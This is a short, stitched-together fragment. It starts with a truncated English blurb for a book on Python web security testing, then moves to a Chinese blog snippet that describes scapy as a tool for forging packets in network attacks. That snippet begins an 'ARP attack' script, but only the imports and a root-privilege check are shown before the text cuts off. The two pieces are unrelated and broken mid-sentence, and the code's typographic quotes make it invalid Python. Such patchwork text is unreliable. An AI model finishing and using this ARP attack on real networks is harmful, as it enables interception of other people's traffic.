Leverage the simplicity of Python and available libraries to build web security testing tools for your application Key Features Understand the web application penetration testing methodology and toolkit using Python Write a web crawler/spider with t
scapy是python写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。
这里就直接用python的scapy搞。
这里是arp的攻击方式,你可以做成arp攻击。
复制代码 代码如下:
#!/usr/bin/python
“””
ARP attack
“””
import sys, os
from scapy.all import *
if os.geteuid() != 0:
print “This program must